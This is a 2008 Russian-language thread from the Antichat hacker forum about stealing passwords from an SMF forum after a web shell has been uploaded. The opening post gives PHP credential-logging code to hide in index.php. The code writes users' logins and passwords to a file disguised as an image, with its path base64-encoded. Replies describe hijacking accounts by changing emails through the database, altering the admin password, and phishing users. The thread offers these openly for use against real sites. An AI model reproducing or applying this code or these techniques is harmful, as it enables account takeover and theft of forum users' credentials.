Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Трояним Smf (узнаём пассы имея шелл) (https://forum.antichat.xyz/showthread.php?t=68728)

n-000 29.04.2008 01:44
Трояним Smf (узнаём пассы имея шелл)
 
Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума !

Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
ПАЛЕВО !!!! скажите -)
Да нет -)
Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
Итак, есть файлик и в него будем сейвить пасы )
Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...
PHP код:
$patch_ getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9kb3QuZ2lm');
        $patch_ str_replace("\\","/",$patch_); 

if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '')
      {  
        $f_l fopen($patch_,'a+');      
   fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");  
       fclose($f_l);      

этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
После него вставляем сам скрипт !
Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))

А что если юзверь авторизуется через куки и пасс вообще не вводит ?
Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
Но и на таких есть управа -)
Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
Удачи вам в вашем нелёгком, но я думаю правильном направлении !

PSalm69 01.05.2008 17:46
а ещё можно
через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d

а ещё можно сменить временно пас админа который не брутиться ( опять же шелл в помошь ) залезть в панель админа форума, если есть возможность увидеть пас в открытом виде узверя который так сволочь тебе нужен аж ппц то всё чисто-гладко,
если не видно - то ты как наделённый правами админа :) шлёшь письмо от лица администратора письмо тому горемыки, чтоб он вражина в срочном порядке подтвердил что он не забыл свой пас и выслал его тебе на мыло в подтверждение - можно сделать массовую рассылку :d

P.s. у многих в подписе вижу: КУПЛЮ ШЕЛЛ С ВОЗМОЖНОСТЬЮ ЗАПИСИ В ИНДЕКС - что значит, другие варианты пролетают, шеллы ваши мы не купим.
А что мешает проделать тоже самое ( о чём не сложно догадаться ) на том шелле где нет прав на редактирования файла? Ничего!
Временная смена паса админу через мускуль (ну если тока речь не идёт об авторизации по Ip ) - заход в админку (правда я встречал такие админки, что как обычным юзером себя чувствуешь - минимализм ) - и меняй что те нуно.... ИМХО в 80% случаев это проканает на ура.

ty13r 04.05.2008 14:54
Цитата:
Можно создать жабаскрипт который перепишет куки юзверю
А можно поподробнее, а то у меня с явой никак

Neorin 04.05.2008 18:04
а че нить такое можно с Ipb Замутить?...млина неплохо было бы!

Rogun 04.05.2008 21:47
где же взять шелл для проделывания таких крутых вещей? :) или хотя бы где его взять для IPB 1.3 Final?

ty13r 05.05.2008 15:13
Такая же фишка для IPB описана здесь
и тут

n-000 10.05.2008 07:27
Цитата:
Сообщение от ty13r
Такая же фишка для IPB описана здесь
и тут
Там эта фишка работает с мускулем и создаёт там левое табло, которое спалят (ИМХО) быстрей, чем неприметную картинку на серваке ...

n-000 10.05.2008 07:33
Цитата:
Сообщение от Rogun
где же взять шелл для проделывания таких крутых вещей? :) или хотя бы где его взять для IPB 1.3 Final?
Ну шел можно взять например от маднета... а как залить его на IPB смотри ТУТ , версия не совпадает но можно попробывать.

c411k 10.05.2008 08:03
Цитата:
Сообщение от PSalm69
а ещё можно
через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d
да ладно, это ж как он ретривнется, если в бд он в хеше хранится? точно не помню, но пасс полюбому новый присылается рандомный.

xaker-boss 10.05.2008 10:07
а невориант посмотреть с конфиге логин и пас к мускул зайти в неё через шел и там посмотреть все пасы пользователей? но при этом открыть страницу md5.xek.cc


Время: 13:31
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице